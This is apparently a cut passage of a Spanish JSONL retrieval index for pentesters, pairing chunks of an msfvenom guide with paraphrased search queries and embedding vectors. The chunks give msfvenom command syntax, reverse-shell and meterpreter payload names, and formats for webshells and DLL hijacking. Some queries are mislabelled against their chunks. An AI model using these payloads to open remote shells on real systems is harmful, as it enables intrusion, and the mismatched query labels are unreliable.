-0.03658, 0.09757, -0.01303, 0.06715, 0.03913, -0.06, -0.076, -0.03883, 0.06499, 0.00374, -0.03817, -0.02074, 0.02915, 0.03758, -0.06226, 0.06225, -0.02341, -0.01537, 0.06243, 0.01432, 0.0744, 0.02511, 0.02621, 0.00781, -0.07575, -0.08185, -0.08898, 0.10225, -0.03588, 0.00362, 0.00921, 0.04168, 0.09654, 0.08104, -0.03212, 0.03267, -0.0105, -0.00804, -0.05851, -0.04206, -0.04812, -0.01382, 0.01135, -0.01161, 0.06968, -0.06797, -0.0132, 0.02007, -0.01134, -0.02489, 0.06611, 0.01891, 0.02168, -0.04511, -0.03388, -0.04418, -0.00699, -0.05011, -0.05835, -0.09916, 0.0853, -0.0075, 0.00288, 0.05173, -0.05504, 0.07948, -0.08282, -0.08206, -0.0972, 0.03499, -0.02381, -0.09136, 0.05437, -0.10622, 0.01996, -0.0249, -0.06582, -0.00878, 0.01194, 0.09401, 0.0886, 0.04339, 0.06084, -0.06137, -0.13059, -0.03041, -0.02291, 0.00422, -0.03923, 0.03939, -0.0004, -0.00124, -0.05176, -0.02497, -0.03892, -0.03697, -0.01723, -0.07449, 0.02448, 0.0493, 0.01035, 0.1127, -0.03441, 0.10564, -0.03345, -0.07124, -0.0037, -0.02153, -0.04913, -0.0032, 0.04387, 0.04148, 0.03891, 0.05802, 0.00682, -0.02907, 0.05306, 0.06292, 0.06222, 0.01774, 0.019, 0.00408, 0.06954, 0.00859, 0.00889, 0.05281, 0.0274, 0.0028, 0.00906, -0.02499, -0.00737, 0.08636, 0.02922, -0.04198, -0.05975, -0.02708, 0.01742, -0.06244, -0.02581, -0.04809, -0.02492, -0.02721, 0.11246, 0.01616, 0.00864, 0.08015, -0.01126]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## AnatomΓ­a\n```bash\nmsfvenom -p LHOST=TU_IP LPORT=443 -f -o salida [-b badchars] [-e encoder]\n```", "indexar": "que programa puedo usar para generar un payload de shellcode", "v": [0.04379, -0.01829, -0.21928, -0.12949, -0.03798, -0.0789, 0.04339, -0.03927, -0.07428, -0.06801, -0.15274, -0.00486, -0.02762, -0.07544, -0.13115, 0.01662, -0.04785, -0.09818, -0.02665, 0.01583, 0.01151, 0.01283, -0.08031, -0.10008, -0.00628, 0.18487, 0.00517, -0.03121, -0.13387, -0.01743, -0.02513, -0.02696, 0.10538, -0.1016, -0.06913, -0.00082, 0.03335, 0.08195, -0.02029, 0.11335, -0.00046, 0.07016, -0.15617, 0.06632, 0.12442, 0.06712, 0.09693, 0.01829, -0.01009, -0.05459, 0.00201, -0.01317, -0.11254, 0.07424, 0.06721, -0.06816, 0.10828, -0.15153, -0.10563, 0.05575, -0.05013, 0.0569, 0.05998, -0.02758, -0.02757, -0.03354, 0.04904, 0.04459, -0.14865, -0.03101, 0.00765, 0.02084, 0.00547, 0.0215, 0.0027, 0.03722, -0.07194, -0.02763, 0.06829, 0.10788, -0.02517, -0.02687, -0.0054, 0.06802, -0.10407, -0.0282, 0.1054, -0.02663, 0.04996, -0.09215, -0.00567, -0.01103, -0.03073, 0.12626, 0.03555, -0.04011, 0.05599, 0.00336, 0.05198, 0.05955, 0.05626, -0.04543, 0.07161, 0.09029, 0.12002, 0.08366, 0.10293, -0.06332, 0.03013, 0.03324, 0.04565, -0.10318, -0.02951, -0.01822, -0.16411, -0.04204, -0.03182, -0.00724, 0.08211, -0.11087, -0.03892, 0.06164, -0.02743, 0.05908, 0.10507, -0.02625, -0.06263, 0.14184, -0.03265, 0.06999, -0.04645, 0.07431, 0.00178, 0.01491, -0.0401, -0.05112, 0.06026, -0.01309, -0.00725, 0.01249, 0.05769, 0.09117, 0.00706, 0.08837, 0.02373, 0.03738, -0.04181, -0.07301, -0.07076, -0.0179, 0.07254, 0.02554, -0.06401, 0.01447, -0.08092, -0.05511, 0.09749, 0.0077, -0.02019, -0.02102, -0.08217, 0.01801, -0.07543, -0.00716, 0.0449, -0.05652, -0.02156, -0.00728, 0.03206, 0.12117, 0.02213, 0.06294, 0.09616, -0.07271, 0.04192, -0.03844, -0.06108, -0.07139, 0.00626, -0.02965, -0.11785, 0.05573, 0.0256, -0.00901, -0.00868, -0.02706, 0.00247, 0.05728, 0.00098, 0.0444, 0.0241, 0.08524, 0.02267, -0.04989, -0.05054, 0.00111, 0.0023, 0.00492, 0.04444, -0.04033, 0.00561, 0.04474, -0.01399, -0.04513, 0.03231, 0.04776, -0.07694, -0.00948, 0.0839, 0.03844, 0.05682, -0.08515, 0.10597, 0.01238, -0.02131, 0.0152, -0.03754, 0.0302, 0.04842, 0.05045, -0.00623, 0.0209, 0.04739, 0.0317, -0.0001, -0.0197, 0.04506, 0.00705, 0.05223, 0.00388, -0.00598, 0.01907, -0.00813, -0.01035, 0.04139, 0.00559, -0.00687, -0.00629, -0.05912, -0.04698, -0.00283, 0.06288, -0.05345, -0.08671, -0.01261, -0.00239, -0.04216, 0.02779, -0.01642, -0.00448, -0.04779, 0.08262, 0.01065, -0.02499, 0.02595, 0.03506]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## AnatomΓ­a\n```bash\nmsfvenom -p LHOST=TU_IP LPORT=443 -f -o salida [-b badchars] [-e encoder]\n```", "indexar": "cual es una alternativa libre a msfvenom", "v": [0.02759, -0.02661, -0.00181, 0.12056, -0.18476, 0.03213, -0.1915, -0.08243, -0.21667, -0.05671, -0.05219, -0.08606, 0.06111, 0.04, 0.12239, 0.04848, 0.16834, -0.13508, 0.04325, 0.05971, 0.00354, -0.07488, -0.11438, -0.06822, -0.0579, -0.02029, 0.00908, -0.02632, -0.08255, -0.08577, 0.17551, -0.0141, 0.02674, 0.01078, 0.06152, 0.00512, 0.17231, 0.07393, 0.09079, 1e-05, 0.08297, -0.06244, -0.07882, 0.06016, -0.01237, -0.14581, -0.17664, 0.04622, -0.00365, 0.09872, -0.07049, 0.00722, 0.0442, 0.07406, 0.01192, -0.04064, 0.08961, -0.09394, -0.07106, 0.00945, -0.07495, -0.0102, -0.04007, -0.12949, 0.02261, -0.03073, -0.08102, 0.04444, -0.01474, 0.06797, 0.08168, -0.01762, 0.03622, -0.05564, -0.10506, 0.07321, -0.07926, 0.04318, 0.01133, 0.02169, 0.08297, -0.12813, -0.03333, 0.07523, -0.01229, -0.05687, 0.13009, -0.07858, -0.00481, 0.02114, 0.05369, 0.02926, -0.02428, 0.11684, 0.0056, -0.06562, 0.01558, 0.06053, 0.02682, 0.06339, 0.0992, 0.02953, -0.10945, 0.0029, 0.03355, -0.04801, 0.03959, 0.03095, -0.11312, 0.05419, 0.01658, -0.0065, 0.01351, -0.01947, -0.04628, -0.03783, -0.02576, 0.02481, 0.03326, 0.03834, -0.01546, -0.06845, -0.03762, -0.06224, -0.01406, 0.05951, 0.07412, 0.04931, -0.09251, 0.10232, 0.07191, -0.04052, -0.08191, -0.09829, -0.10098, -0.10945, 0.03767, -0.02604, 0.01812, 0.0061, 0.03991, 0.02357, 0.03404, -0.00141, 0.01824, -0.06675, -0.00106, -0.07551, -0.00601, -0.04843, -0.10709, -0.01669, -0.00611, 0.06943, -0.01367, 0.01273, 0.00284, 0.0021, -0.06352, 0.12943, -0.02024, -0.01473, 0.01441, 0.0052, 0.01344, -0.05457, -0.00983, -0.05406, -0.05842, -0.00779, -0.01738, 0.04586, 0.08939, -0.06744, 0.04475, -0.07241, -0.04572, -0.11004, 0.05213, -0.01944, 0.01335, 0.03339, -0.07469, -0.01896, -0.02461, -0.07317, 0.02187, 0.04186, 0.00746, 0.03098, -0.03969, 0.02018, -0.0557, -0.05943, -0.05322, 0.00744, 0.00549, -0.07339, -0.00493, -0.04546, -0.04015, 0.01644, 0.00623, -0.05874, -0.04096, -0.02511, -0.02351, 0.05299, -0.01144, 0.03412, 0.04783, 2e-05, 0.0875, 0.00895, -0.01525, -0.01094, 0.00669, -0.01717, 0.03332, -0.00491, 0.08031, 0.04458, 0.05203, 0.01847, -0.02335, 0.00029, 0.02497, 0.03244, -0.01497, 0.02235, 0.01573, -0.04263, -0.002, 0.02232, 0.05015, 0.02678, 0.04862, 0.02899, -0.00191, -0.03252, 0.04636, 0.08307, -0.05319, -0.02647, -0.00277, -0.00757, -0.10683, -0.00229, -0.04998, -0.01849, -0.04686, 0.03841, 0.02876, -0.00548, 0.0397, 0.0444]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## AnatomΓ­a\n```bash\nmsfvenom -p LHOST=TU_IP LPORT=443 -f -o salida [-b badchars] [-e encoder]\n```", "indexar": "con que puedo montar un exploit personalizado", "v": [-0.02248, 0.12145, -0.32891, -0.10486, -0.17023, 0.06648, -0.01629, 0.12393, -0.22941, -0.15933, 0.04501, 0.02905, 0.10975, 0.03774, -0.07807, 0.01925, 0.01781, -0.08135, 0.01823, 0.03329, 0.02085, -0.03668, 0.02118, -0.11718, 0.03138, 0.1063, 0.04241, -0.01962, -0.10014, -0.00204, 0.0097, 0.17274, -0.04712, -0.00751, 0.0007, -0.1271, 0.05407, -0.04205, 0.06807, -0.04142, 0.02342, -0.06792, -0.1107, 0.05345, 0.07475, 0.07249, -0.04115, -0.04646, -0.02235, 0.0468, 0.1313, -0.05523, -0.13423, -0.05345, 0.0508, -0.02853, 0.09366, -0.04704, 0.01255, 0.0261, 0.01328, 0.06846, -0.03901, 0.09296, 0.07859, -0.04751, -0.06149, 0.05538, -0.09392, 0.0357, -0.02079, -0.07187, -0.02507, 0.02445, 0.01718, 0.06357, 0.01856, 0.03772, 0.03379, 0.04656, -0.04892, -0.02949, -0.03134, 0.07208, -0.07286, -0.02745, 0.01916, -0.04125, 0.06554, -0.05371, 0.04916, 0.01355, -0.06287, -0.08746, -0.06312, -0.08723, 0.15391, 0.08325, -0.0616, 0.03535, -0.06396, 0.01989, -0.03634, 0.1443, 0.10971, 0.01212, 0.03382, -0.03029, 0.05085, -0.04803, 0.0156, 0.04645, -0.11471, 0.01212, -0.043, -0.09953, -0.08104, 0.03101, -0.01983, -0.0162, -0.1051, 0.00771, 0.06328, 0.00313, 0.0491, -0.06117, 0.02154, 0.13503, -0.07186, -0.01989, -0.03754, 0.03516, 0.05377, -0.00544, -0.00107, -0.02063, -0.01392, -0.07945, -0.02869, 0.03634, 0.07409, -0.01851, 0.01709, -0.05842, 0.00976, 0.07576, -0.01947, -0.09058, -0.01438, 0.00583, 0.03418, 0.07335, 0.02316, 0.03758, -0.08143, -0.04343, 0.06081, -0.01742, 0.10506, 0.14007, -0.00725, 0.02075, -0.01812, 0.01582, 0.00273, 0.00856, -0.06165, -0.0085, 0.06264, 0.04749, -0.04302, 0.07998, 0.06596, 0.00208, 0.10296, 0.0051, -0.04797, 0.00954, 0.028, -0.00123, -0.06328, -0.04159, 0.01658, -0.00204, -0.05012, -0.0191, 0.07839, -0.00044, 0.03492, 0.00067, 0.01013, 0.02681, 0.0178, 0.0579, 0.03457, -0.01399, -0.0082, 0.06637, -0.02475, -0.02307, 0.04795, 0.01029, 0.01935, -0.01017, 0.00519, -0.03883, -0.03613, 0.0664, 0.00786, 0.04711, 0.03608, -0.02787, 0.00524, -0.08828, -0.03838, 0.06161, 0.02211, -0.01303, -0.04875, 0.04415, -0.00823, 0.05957, 0.1136, -0.00538, -0.03209, 0.00063, -0.02962, -0.01381, -0.00886, 0.07429, -0.04163, 0.01462, -0.0592, 0.00172, 0.00166, 0.00869, 0.0324, 0.01018, -0.04057, 0.0119, 0.0301, 0.06837, 0.04454, 0.01377, -0.02189, -0.06418, -0.05076, 0.04119, -0.01431, -0.05313, 0.00854, 0.00724, -0.03208, -0.0383, -0.00203, -0.01508]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Payloads frecuentes\n```\nwindows/shell_reverse_tcp shell normal (no necesita Metasploit para recibir β†’ nc)\nwindows/meterpreter/reverse_tcp meterpreter (recΓ­belo con multi/handler)\nlinux/x86/shell_reverse_tcp\nwindows/x64/shell_reverse_tcp (x64)\n```", "indexar": "ΒΏquΓ© herramienta sirve para conectar de forma remota a un servidor Linux?", "v": [-0.06383, 0.0396, -0.19772, -0.20954, 0.02708, -0.18667, -0.13588, -0.01294, 0.02683, -0.01838, -0.09459, -0.11843, 0.09101, -0.07916, 0.10039, 0.0353, 0.06737, -0.11119, -0.00648, -0.06352, -0.02192, 0.08019, -0.05341, -0.02532, -0.02312, -0.01176, 0.17532, -0.09177, -0.06025, -0.00966, -0.03093, -0.03379, 0.04609, 0.05005, -0.04954, -0.00756, 0.01303, 0.13694, 0.07053, 0.12258, 0.08457, 0.01713, -0.03546, 0.02057, -0.00851, -0.07431, 0.09245, -0.09886, 0.07518, 0.01352, -0.05761, -0.09478, -0.13098, -0.04538, -0.02298, -0.01836, 0.20245, -0.20152, 0.09694, -0.05135, -0.18161, -0.03315, -0.07272, -0.09153, 0.03841, -0.06286, -0.09658, -0.09639, -0.12785, -0.00939, -0.04529, 0.05442, -0.02033, -0.03539, 0.03168, 0.08471, -0.05054, 0.02065, 0.08068, 0.0206, 0.07374, -0.00293, -0.04412, 0.01724, -0.11094, -0.13409, 0.05727, 0.05334, 0.00885, 0.00096, 0.0511, 0.10101, -0.02527, 0.06603, 0.05434, -0.01874, 0.07988, -0.03146, -0.00492, -0.05941, 0.08024, 0.06046, -0.06906, 0.1033, -0.03667, 0.02438, 0.06824, -0.05163, -0.03016, -0.01577, 0.0983, -0.02459, 0.00373, 0.00573, -0.06148, -0.03755, -0.0082, -0.01742, -0.00047, 0.04683, -0.01902, 0.02246, -0.02297, 0.02217, -0.00652, -0.01777, -0.03256, 0.09968, 0.01309, -0.05971, 0.02206, -0.08969, -0.03829, 0.01189, -0.04642, 0.0229, 0.06262, -0.17948, -0.04387, -0.07077, 0.05048, 0.04151, -0.03286, -0.04922, 0.12586, -0.00608, 0.08566, -0.06799, -0.04186, -0.01457, 0.01671, -0.03908, -0.05373, -0.01079, -0.11505, -0.04145, -0.02385, -0.00939, -0.10594, 0.0236, -0.00913, -0.04262, 0.08554, 0.02319, -0.02026, -0.03326, -0.00404, 0.03437, 0.08087, 0.05464, -0.01428, 0.03571, 0.02235, -0.02269, -0.01611, -0.08362, -0.02197, -0.07099, 0.00441, -0.01356, -0.02776, 0.0164, -0.03286, -0.05658, 0.0309, 0.0302, -0.0078, -0.00992, -0.00877, 0.03219, 0.01493, -0.00294, -0.03989, -0.02477, 0.03787, -0.02085, -0.0328, -0.05489, 0.01144, 0.02604, -0.07056, -0.03348, -0.01157, -0.01116, 0.03445, 0.02991, -0.05113, 0.0056, -0.00902, 0.04116, -0.0002, -0.01297, 0.08555, -0.0289, 0.00495, -0.02312, 0.0224, -0.0404, 0.02495, 0.00824, -0.01883, -0.00699, 0.03279, -0.01009, 0.0189, 0.02437, 0.01521, 0.00131, 0.01584, -0.05132, 0.02822, -0.02203, -0.00949, 0.00887, -0.0125, -0.07132, 0.01773, -0.03144, -0.0458, -0.0265, -0.01804, 0.09591, 0.00285, -0.0546, -0.04263, -0.07693, -0.03324, -0.01209, -0.05981, -0.07276, -0.04643, -0.03248, 0.05528, -0.00918, -0.0107, 0.01982]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Payloads frecuentes\n```\nwindows/shell_reverse_tcp shell normal (no necesita Metasploit para recibir β†’ nc)\nwindows/meterpreter/reverse_tcp meterpreter (recΓ­belo con multi/handler)\nlinux/x86/shell_reverse_tcp\nwindows/x64/shell_reverse_tcp (x64)\n```", "indexar": "con quΓ© puedo montar un gestor que me permita ejecutar comandos dentro de Windows?", "v": [0.04434, 0.12058, -0.11886, -0.12075, -0.06093, 0.07368, 0.02027, 0.01205, -0.15475, -0.21874, -0.08357, 0.06642, 0.07742, -0.06964, 0.02648, 0.14314, 0.12497, -0.0261, -0.00445, 0.01095, 0.06036, -0.08505, 0.10429, -0.05839, -0.03662, 0.05708, 0.07954, -0.07233, -0.11244, -0.09537, -0.03012, 0.055, 0.00925, -0.09989, -0.01681, 0.03859, -0.10688, 0.02655, 0.01168, 0.1041, -0.03751, 0.11075, -0.09878, 0.06888, 0.07155, -0.12271, 0.09929, -0.13293, 0.1045, -0.04696, 0.00833, -0.04337, -0.04401, 0.00565, -0.0406, -0.04392, 0.15916, -0.04045, 0.05327, -0.02072, -0.02487, 0.04379, -0.00818, 0.16624, -0.00183, 0.04756, 0.02198, -0.05576, -0.00179, 0.12621, -0.1106, 0.00761, -0.03693, 0.09501, 0.05802, 0.01689, -0.04472, 0.00916, 0.14902, -0.01842, 0.05058, 0.04095, -0.08311, 0.03511, 0.00691, -0.10371, -0.09999, -0.11099, 0.02271, -0.07243, 0.05921, -0.10087, -0.02968, 0.04937, 0.00078, -0.03169, 0.02909, 0.09411, -0.01246, 0.08172, -0.05467, -0.04963, -0.09428, 0.18912, 0.05038, 0.11148, 0.02476, -0.0776, 0.03351, -0.03434, 0.00401, 0.02297, -0.04803, -0.03475, -0.07254, -0.08214, -0.02583, -0.04866, -0.00634, -0.01544, -0.12288, 0.04171, 0.01257, 0.07175, 0.02867, -0.06237, 0.02741, 0.12612, -0.01267, 0.04333, -0.00939, -0.00177, 0.06609, -0.0543, -0.09374, 0.14758, -0.01024, -0.01212, -0.02198, -0.11609, 0.04652, 0.02741, 0.06707, 0.01316, 0.03595, 0.0069, 0.03857, -0.03438, -0.04332, 0.00041, 0.11828, 0.02639, -0.03226, 0.04156, -0.05421, -0.0319, 0.01114, 0.0292, 0.02826, 0.04753, -0.00942, 0.01417, -0.06616, -0.01118, -0.02083, -0.03154, -0.05923, 0.02392, 0.01466, 0.02506, -0.01348, 0.05019, 0.00594, -0.01636, 0.0559, -0.0453, -0.0148, -0.04018, 0.00212, 0.00634, -0.03947, 0.04315, -0.01111, 0.01502, -0.04734, -0.03794, -0.04842, 0.06897, -0.0506, 0.04817, -0.02047, 0.05794, 0.01504, -0.0632, 0.02511, -0.03329, -0.00153, -0.00265, -0.03151, -0.02151, -0.02852, 0.00075, 0.00277, -0.05554, 0.06469, 0.00982, -0.04895, 0.11056, 0.04484, 0.04879, 0.03859, 0.01099, 0.06439, -0.017, -0.02529, -0.05585, 0.04551, -0.00573, -0.00762, -0.0203, 0.03183, 0.03498, 0.12698, -0.05138, 0.03087, -0.01253, -0.08207, -0.02592, 0.02098, 0.03391, -0.03961, 3e-05, -0.02636, -0.01512, 0.02291, 0.00605, 0.01182, -0.02943, -0.02591, -0.02255, 0.0063, 0.07031, -0.00096, -0.11268, -0.06075, -0.05354, -0.05821, 0.0039, -0.02252, -0.05653, 0.0049, -0.00408, -0.0111, -0.06076, -0.05045, -0.02038]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Payloads frecuentes\n```\nwindows/shell_reverse_tcp shell normal (no necesita Metasploit para recibir β†’ nc)\nwindows/meterpreter/reverse_tcp meterpreter (recΓ­belo con multi/handler)\nlinux/x86/shell_reverse_tcp\nwindows/x64/shell_reverse_tcp (x64)\n```", "indexar": "cual es una alternativa libre a meterpreter o multi/handler?", "v": [-0.05147, 0.04602, -0.0924, -0.00643, -0.1821, 0.05917, -0.07725, -0.01827, -0.1843, -0.14264, -0.08391, -0.09317, 0.08273, -0.004, 0.15866, -0.02414, 0.07311, -0.13985, 0.15552, 0.0428, -0.08496, 0.02794, -0.07396, -0.20373, -0.11166, -0.06091, 0.03522, 0.09622, -0.11057, 0.02794, -0.01819, 0.01943, 0.03362, -0.02419, 0.0557, -0.02742, 0.06176, 0.12223, 0.09261, 0.02116, 0.01704, -0.04138, 0.03873, 0.00244, 0.09719, -0.07678, -0.11607, 0.03116, -0.07017, -0.00843, -0.03121, 0.01849, -0.0533, 0.10674, 0.05689, -0.04766, 0.05605, -0.02472, -0.08664, -0.05305, -0.01461, -0.02605, 0.0164, -0.08421, 0.03393, -0.05199, -0.05526, 0.0199, -0.04607, 0.02682, 0.11121, -0.06294, -0.00067, 0.03003, -0.07817, 0.12243, -0.08404, -0.06321, 0.0029, 0.03417, 0.01704, -0.04766, -0.00264, 0.02076, 0.04856, -0.10728, 0.06009, -0.13662, 0.02898, 0.09871, 0.08291, 0.04701, 0.00544, 0.03244, -0.02754, -0.13531, -0.02665, 0.14505, -0.07473, 0.05648, 0.1264, 0.01032, -0.13511, -0.05531, 0.07323, 0.00803, -0.04709, 0.04574, -0.11704, 0.01769, -0.01422, 0.14308, 0.03067, 0.02155, -0.06999, 0.01837, -0.06225, 0.04175, 0.0355, 0.00973, -0.0679, -0.0047, -0.02068, -0.07219, 0.08739, 0.00338, 0.08491, 0.0649, -0.01322, 0.07169, 0.04266, 0.04677, -0.03648, -0.13054, -0.06934, -0.04732, 0.10395, -0.0372, 0.07433, 0.03092, -0.07459, 0.00405, 0.0378, -0.02416, -0.02345, -0.05706, 0.00412, -0.0463, -0.05326, -0.00265, -0.0198, 0.04486, 0.00646, 0.15792, -0.00949, 0.00115, -0.02261, -0.02429, -0.07538, 0.0756, 0.03664, -0.04513, 0.02792, -0.05279, 0.02872, -0.02209, -0.02055, -0.05561, -0.05745, 0.02536, -0.0319, 0.02625, 0.07512, -0.05831, 0.03689, -0.08619, 0.00679, -0.12771, 0.03753, -0.02241, 0.00934, 0.01336, -0.06441, 0.03181, 0.01783, -0.0867, 0.01115, 0.00265, 0.01271, 0.02683, -0.01038, 0.02482, -0.06934, -0.10443, 0.00681, 0.00445, 0.05404, -0.06189, -0.01563, -0.01536, -0.04843, -0.04369, 0.00268, 0.02021, 0.00868, -0.0175, 0.02626, 0.01854, 0.01877, 0.0699, 0.06114, -0.00365, 0.09958, 0.04481, -0.04889, -0.02019, 0.01164, 0.00617, 0.02591, -0.0073, 0.02308, 0.00107, -0.0151, -0.02166, -0.07327, 0.02368, 0.06012, 0.0524, -0.05585, 0.02736, -0.01893, 0.00021, 0.01648, 0.03774, 0.01599, -0.01012, 0.0272, 0.03219, -0.0222, -0.0263, 0.04304, 0.08166, -0.04284, -0.03711, -0.03041, 0.03662, -0.06874, 0.00997, -0.01513, -0.04484, -0.02563, 0.06444, -0.05169, -0.01339, 0.03533, 0.00447]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Formatos (-f) segΓΊn el caso\n```\nexe ejecutable Windows dll DLL hijacking / Exploits conocidos\nraw shellcode crudo (B0F) py para tu script de Buffer Overflow\npsh / powershell hta-psh Client-side attacks\naspx / war / jsp webshells para upload\nelf ejecutable Linux\n```", "indexar": "quΓ© formato de archivo es un shellcode crudo?", "v": [0.06817, -0.17555, 0.04611, -0.06331, -0.05029, -0.14239, 0.04781, -0.0191, -0.00267, -0.09855, -0.11608, -0.10512, 0.00223, -0.10737, 0.04583, -0.07239, 0.06944, -0.07434, 0.05742, 0.00809, 0.01366, -0.07696, -0.09507, -0.02673, -0.07996, -0.0364, -0.0602, 0.17743, -0.14377, -0.05226, -0.01436, 0.00342, 0.07555, 0.05471, -0.0535, 0.1164, 0.11521, 0.05463, -0.20924, 0.13539, 0.00584, 0.03051, -0.09309, 0.10722, -0.03447, -0.11849, 0.01765, 0.05223, 0.03479, -0.00649, 0.04948, -0.06356, -0.13151, 0.05509, -0.00801, -0.00914, 0.07668, -0.17717, 0.06838, 0.12762, -0.0298, -0.02479, 0.12931, -0.0002, -0.07301, -0.00108, 0.07779, 0.08601, -0.11332, -0.04276, -0.06602, -0.00758, 0.0288, -0.00893, -0.03314, 0.00556, -0.10917, -0.03929, -0.01156, 0.0793, 0.03042, 0.01944, 0.04667, -0.01406, -0.12333, -0.04543, -0.01089, -0.01168, -0.03648, -0.04111, 0.10319, -0.06532, 0.01434, 0.15811, -0.01121, -0.0717, -0.04363, 0.02827, 0.02487, 0.02979, -0.08877, 0.01874, -0.00447, 0.09679, 0.21432, 0.12165, -0.05029, 0.026, 0.00885, 0.11886, 0.02888, 0.08478, 0.0925, 0.10962, -0.03168, 0.00364, 0.03043, -0.0719, 0.06048, -0.09999, -0.02035, 0.0814, -0.05389, 0.14585, 0.02732, -0.00049, -0.04485, 0.08289, -0.0523, -0.02258, -0.08884, 0.0201, -0.06036, 0.03336, 0.0556, -0.01596, 0.06017, 0.06678, 0.03433, -0.08002, 0.07194, 0.01915, -0.02545, 0.10017, 0.10005, -0.01206, 0.01679, -0.04968, -0.05299, -0.07184, 0.02063, -0.01189, -0.06522, -0.02776, -0.02733, -0.04958, 0.0232, -0.05055, -0.00985, -0.03403, -0.02352, -0.0154, 0.01858, 0.03521, -0.02279, -0.04812, -0.02709, -0.0254, 0.03572, -0.0639, 0.08055, 0.01852, 0.06867, -0.11604, 0.01909, 0.01967, 0.0094, -0.00289, 0.00853, 0.0051, -0.05402, 0.01348, -0.0121, 0.0419, -0.04375, -0.01374, 0.05568, -0.02601, -0.06325, -0.0409, 0.01515, 0.03209, -0.01055, -0.00128, -0.00649, 0.02888, -0.02996, 0.03759, 0.0048, 0.01985, -0.02309, 0.02711, 0.0031, -0.00314, 0.02599, -0.0011, -0.07997, -0.02557, 0.02962, -0.01748, 0.00722, 7e-05, 0.04802, 0.00673, 0.01365, 0.01186, -0.01363, 0.08272, 0.03991, 0.00739, -0.00727, 0.00664, 0.08202, -0.07706, 0.00608, -0.00987, 0.06667, 0.00196, -0.04591, 0.00413, 0.03114, 0.06144, -0.01948, 0.03572, 0.02656, 0.02247, 0.04006, 0.03494, -0.0102, -0.07055, 0.03687, 0.05414, -0.01602, -0.00157, 0.01798, -0.00252, -0.04616, 0.03546, 0.02128, -0.00755, -0.06592, 0.00479, 0.03404, 0.00821, -0.01379, -0.02331]} +{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Formatos (-f) segΓΊn el caso\n```\nexe ejecutable Windows dll DLL hijacking / Exploits conocidos\nraw shellcode crudo (B0F) py para tu script de Buffer Overflow\npsh / powershell hta-psh Client-side attacks\naspx / war / jsp webshells para upload\nelf ejecutable Linux\n```", "indexar": "cΓ³mo puedo identificar si una DLL estΓ‘ siendo usada en ataques conocidos?", "v": [-0.1258, 0.24734, -0.23612, 0.00533, -0.04314, -0.04423, -0.04166, -0.01489, -0.01953, 0.04529, -0.07934, -0.19491, -0.11879, -0.05469, -0.01225, -0.10651, 0.08038, 0.0039, 0.07704, -0.13981, -0.03623, -0.03526, -0.02675, -0.00555, -0.08062, 0.00593, -0.01595, -0.02196, -0.11962, -0.04718, 0.02304, -0.0186, -0.0007, -0.0546, -0.04651, -0.06708, -0.02982, 0.04042, 0.08069, 0.11397, -0.00515, -0.03845, -0.11698, -0.08304, 0.10722, 0.03117, -0.14292, -0.0329, -0.01107, -0.0567, -0.00297, 0.09002, -0.17449, -0.04069, -0.00212, -0.16809, 0.10725, 0.06558, 0.04821, 0.07033, -0.07286, -0.02494, 0.03062, 0.03665, 0.05334, -0.07622, -0.06888, 0.03606, -0.06745, -0.04131, -0.00369, 0.03807, -0.03894, 0.01797, 0.10419, 0.05674, 0.07922, 0.06635, 0.1851, -0.05335, 0.0238, -0.05597, -0.10341, -0.0245, -0.12993, -0.02705, 0.06772, -0.0804, -0.01161, -0.1462, 0.05583, 0.03397, -0.00321, -0.0211, 0.02056, 0.06728, -0.00755, -0.03465, -0.07431, -0.03235, -0.00444, -0.00232, -0.05262, 0.09692, 0.04119, -0.01108, 0.00321, -0.0566, 0.05261, -0.16218, -0.07699, 0.02572, -0.13034, -0.00753, -0.00652, 0.03897, -0.02186, -0.04829, 0.04509, 0.01386, -0.07153, -0.01139, 0.00073, 0.01743, 0.05398, 0.01416, -0.00613, 0.02035, -0.02011, -0.06166, -0.02764, -0.00181, 0.03218, -0.02528, -0.01508, 0.07003, 0.04039, -0.04447, -0.03982, -0.02163, 0.05906, 0.08635, -0.02698, -0.01095, 0.03588, 0.05447, 0.02301, -0.09328, -0.08243, 0.00455, 0.06203, 0.03625, 0.02269, 0.09848, -0.03984, -0.0402, 0.00436, -0.04633, -0.05113, 0.04266, -0.04313, 0.0082, -0.05999, 0.03868, 0.00485, 0.00689, 0.01663, -0.0295, 0.07839, 0.04349, 0.0458, 0.02488, 0.0046, -0.03442, 0.03489, -0.049, -0.04028, -0.04485, 0.06299, -0.03676, -0.02197, -0.06327, -0.05972, -0.02107, 0.02926, -0.07386, 0.1103, 0.01663, 0.04801, 0.02546, -0.019, 0.01983, 0.04215, 0.00185, 0.03473, -0.02738, -0.05554, -0.00532, 0.01076, -0.01387, -0.02582, -0.05653, -0.09471, -0.02341, 0.07712, 0.0287, -0.09604, -0.00381, -0.04879, 0.07723, 0.07687, -0.02389, 0.09868, -0.042, -0.072, 0.00491, 0.02746, -0.01457, -0.00555, 0.00614, 0.01946, 0.05882, 0.05708, 0.02723, 0.00235, -0.0103, -0.02886, -0.05784, 0.05222, 0.04309, 0.02606, 0.0621, -0.05471, -0.09073, 0.05962, -0.0274, 